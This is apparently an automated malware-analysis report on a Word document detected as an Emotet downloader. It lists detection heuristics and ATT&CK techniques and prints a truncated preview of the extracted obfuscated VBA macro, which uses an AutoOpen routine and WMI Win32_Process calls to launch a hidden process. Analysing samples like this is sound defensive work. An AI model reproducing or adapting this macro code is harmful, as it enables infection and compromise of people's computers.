MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample was detected as Emotet by ClamAV and exhibits characteristics of a downloader. The presence of an AutoOpen VBA macro, coupled with a CreateObject call, strongly suggests the macro is designed to execute malicious code. The obfuscated string concatenation within the AutoOpen subroutine likely forms a command to download and run a second-stage payload, a common Emotet tactic.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4755 bytes |
SHA-256: b71326e4d2f021f059ef16d129854bc625c3654cf6f1d2d69f63b4c558041e69 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "QWEo84t7, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "Dhfnaz, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "Z80BU6vw, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
Debug.Print "Q_3QjEW" + ("BItwX5k" + ("hPCU08F" + "aiLDVrn" + "KSnTIw" + ("i0VrCS" + ("C_iAB6K") + "r8Y0wBL" + "TE3UHQN")) + "FK8dPS" + ("kIUQRH")) + "P1tC39Ko" + (qlt4OzDo) + "YXrFXjVD" + "E8Rc1af" + "IATCVi_" + "uhNoEsZ7"
EHfKls
Debug.Print "ASaG9s9W" + ("LJhZ2LW9" + ("q_rovC9" + "kuzTd3" + "X7s0Km7" + ("d1OOz4c" + ("AmzV6v7U") + "V1Di4i" + "DapYvj")) + "Gwz43WH" + ("S2GB8D1T")) + "ojSVq52" + (Qn2NMcnH) + "HDskshs" + "GXzFz5" + "rcI0A9WJ" + "h5jU7U4"
End Sub
Attribute VB_Name = "c124LB"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "b4oc4zjM"
Attribute VB_Name = "O9GT1o_n"
Attribute VB_Name = "JNriqt"
Attribute VB_Name = "pkHt_2i"
Attribute VB_Name = "RQUAWTi"
Attribute VB_Name = "rSVhjNI"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "OPKTCMwi"
Function EHfKls()
hK5Ks9 = ThisDocument.Dhfnaz + ThisDocument.Z80BU6vw + ThisDocument.QWEo84t7
Debug.Print "k7ppNhl4" + ("HL_tNbw" + ("q0zLoXJD" + "WcHTaD7" + "WBi7mE2u" + ("zRMLKF" + ("nBSEdKj_") + "skqSE3" + "QCMHznh0")) + "MQ9OpK" + ("jWiUanE")) + "CapNVjdv" + (hOpifrbv) + "j6fGtO" + "AnkC9v" + "q36vii9" + "G9zDn_3"
bvYvlf = "m" + "ts" + ":Win32" + "_Proces"
Debug.Print "LFL5041" + ("TcY5GZ" + ("jLCaYb" + "jvNt0nN" + "zZKuRi0" + ("RZBDvpDz" + ("w81pFS") + "f_OvPr" + "zhiWsE")) + "ErlkAjp" + ("wsZHvFc")) + "S2tlKUf" + (bQvh6WZ) + "kzHDVEO" + "HBPbGbVs" + "ZjQEZ5H5" + "pDsKrvI"
NtwOAnVd = hX5VVka + "w" + "in" + "mg" + QMNmsF + bvYvlf + "s"
Debug.Print "a95rLb" + ("fpS08B3" + ("zlNjvf" + "k7bJwF" + "czdndH" + ("Zjk0XZzK" + ("VCvrvdW") + "aja1j62" + "T7z1jS")) + "vjvSIR" + ("jUX3E_")) + "jjVDtBDj" + (olwkicm) + "ozLXSzp" + "YhIYo4M" + "Ad5fOSjf" + "E27Pjbf"
Q1iwpX(NtwOAnVd) _
.Create# hK5Ks9, CREHdD, q0F1QYf, U86Ybfl
Debug.Print "VGssoz" + ("GoKM7TM" + ("LlcTqmR" + "TF5wzw" + "Ecmi5BOY" + ("iP3zb69" + ("X7tibC") + "AbU3YV9" + "zGUkO7TC")) + "Xko01Ir" + ("S9Lfkl")) + "BrR66jr7" + (ZO_Zb1) + "rXdius86" + "plv0A_RW" + "cB9C9wM" + "wjV3sw"
End Function
Attribute VB_Name = "zk9Aq6I"
Function q0F1QYf()
bvYvlf = "mt" + "s" + ":Win32" + "_Proces"
Debug.Print "chSCfZr" + ("odWj1sw" + ("G1nAoPtd" + "iVZmZPI" + "vhZuEHn" + ("bLTRYT" + ("Bi4CUCrT") + "S38QrB" + "PtFi4Bvo")) + "DY8F_lN" + ("Rlfta_3Q")) + "NfR3jB" + (Zp3SrGKP) + "O3WDGO" + "p_qjBw" + "iCzjaDG" + "w7D6YjKS"
NtwOAnVd = oNYDwPO5 + "w" + "in" + "mg" + hFKLbIdL + bvYvlf + "s" + "Startup"
Debug.Print "ucGod_w" + ("BWYlb06T" + ("PIIiGQ98" + "wYcrUTT" + "SdviTR" + ("UDziZX" + ("Vv6AXjC") + "vo5sQHp" + "iQiozQ")) + "d5KFhA" + ("viYq32a")) + "VniYI7HU" + (czw8oWM8) + "XXnQVWjQ" + "q1pran" + "W0DvNSEj" + "nUp5RNf"
Set q0F1QYf = Q1iwpX(NtwOAnVd)
Debug.Print "tqGQjZUj" + ("Is4IYco3" + ("mE81WI3" + "Phb3Zj" + "ZFN4YhYL" + ("zWllhk" + ("ptQ5bi") + "Ndu1ina" + "oUjWii")) + "w5aksA3" + ("kOcloqU")) + "wc5tV7" + (mPkrQLm) + "hH1id4G" + "KTiHpOXQ" + "mNjftQ" + "HqcD1VJ"
With q0F1QYf
Debug.Print "Q2I9kE" + ("zUGcYwj" + ("s68kOJFA" + "THrcJH" + "FiLMHp" + ("YPAGpR" + ("mJipFrD8") + "QhQ39U" + "XKvpzRl")) + "rAiYG5rt" + ("NPabOQG")) + "qmSrnMz" + (DWNE7_) + "TnNnkJ8r" + "BujYq7" + "EiU7MR3" + "hbLTaOS"
. _
ShowWi
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.